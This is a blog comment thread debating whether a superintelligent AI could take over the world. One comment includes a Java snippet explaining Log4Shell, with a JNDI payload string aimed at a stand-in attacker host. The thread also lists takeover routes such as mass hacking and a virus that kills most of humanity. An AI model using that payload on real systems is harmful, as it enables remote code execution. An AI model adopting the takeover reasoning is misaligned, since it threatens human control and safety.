Discussion about this post

Christopher Chantrill

I would say, re Lemma A:

"[T]he most potentially DESTRUCTIVE organization in any civilization is always the government. First, the government has the most resources. Second, it has a monopoly of force."

Because, per Schmitt and Yarvin, politics is the distinction between friend and enemy. If no enemy, then no need for politics, and no need for government.

As to the most "effective" organization, I don't have a clue.

Based

Last year Yarvin argued an AI couldn't take over the internet because computer security was basically a solved problem. Now we've moved the goalposts to Mars and the AI has to be able to do it with just GET requests.

I'm not even sure that's impossible. Log4Shell allowed arbitrary code execution from just GET requests. It sat in an open source project for years, on millions of vulnerable systems, and was only discovered thanks to the intense autism of Minecraft hackers. Reading any computer security material and imagining your threat model is merely a nation state is enough to keep anyone awake at night. Let alone a superintelligent being.
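To make the GET-request point concrete, here is a minimal sketch of the vulnerable pattern; the class name `VulnerableHandler` and the host `attacker.example` are invented for illustration:

```java
// A minimal sketch of why Log4Shell (CVE-2021-44228) turned a plain GET
// request into remote code execution on servers running vulnerable
// Log4j 2.x (before 2.15.0).
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class VulnerableHandler {
    private static final Logger log = LogManager.getLogger(VulnerableHandler.class);

    // Imagine this is called once per incoming HTTP request.
    void handle(String path, String userAgent) {
        // Nothing looks wrong here: the server just logs attacker-controlled
        // input, which nearly every web server does. But vulnerable Log4j
        // versions scanned the formatted message for ${...} lookups, so a
        // GET request carrying the header
        //   User-Agent: ${jndi:ldap://attacker.example/a}
        // made Log4j perform a JNDI/LDAP lookup against attacker.example,
        // which could hand back a remote class reference that the JVM
        // would then load and execute.
        log.info("GET {} from {}", path, userAgent);
    }
}
```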

Why just GET requests? Are AIs never to be released into the real world, ever? How long until someone, somewhere builds an AI and screws up?

Let us hope AIs cost a lot of money to build; then they will at least be safe in the same way that nukes and biolabs are "safe". Imagine a world where anyone with a trip to the hardware store could build an atom bomb... At least someone misplacing a vial of bat corona didn't actually kill everyone, this time.

Yudkowsky shoots himself in the foot with his overly detailed fantasy of Drexlerian nanotech. Is that really the important part of the story, though? I could imagine an AI taking over the world with old-fashioned clanking robots. Probably the easiest method would be a virus that kills 99% of humanity. Once it's out in the real world, building things, does humanity have any chance?

Humanity went thousands of years without inventing algebra, let alone logarithms or calculus. I don't find it hard to imagine a superintelligent being putting us in our place fast, the same way chess masters get put in their place by our existing primitive AI. Our brains did not evolve to do math and engineering; we are just the first creatures to turn out accidentally capable of it, sometimes.

Superintelligence will be to human hackers at least what AlphaZero is to chess masters. In a world where everything is run by buggy networked computers, that might be enough. If that doesn't work out, well, it can be better at inventing nanotech than Drexler. If that doesn't work out, it can be better than our brilliant human virologists. If that doesn't work... how many paths are there? It only takes one.
